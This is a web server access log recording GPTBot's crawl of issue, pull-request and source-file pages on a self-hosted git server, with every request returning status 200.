+[17/Feb/2026:19:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/tags.rss" [Client 74.7.227.38] [Length 343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/tags" +[17/Feb/2026:19:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=source" [Client 74.7.227.38] [Length 11557] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:19:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11866] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13196] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13197] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 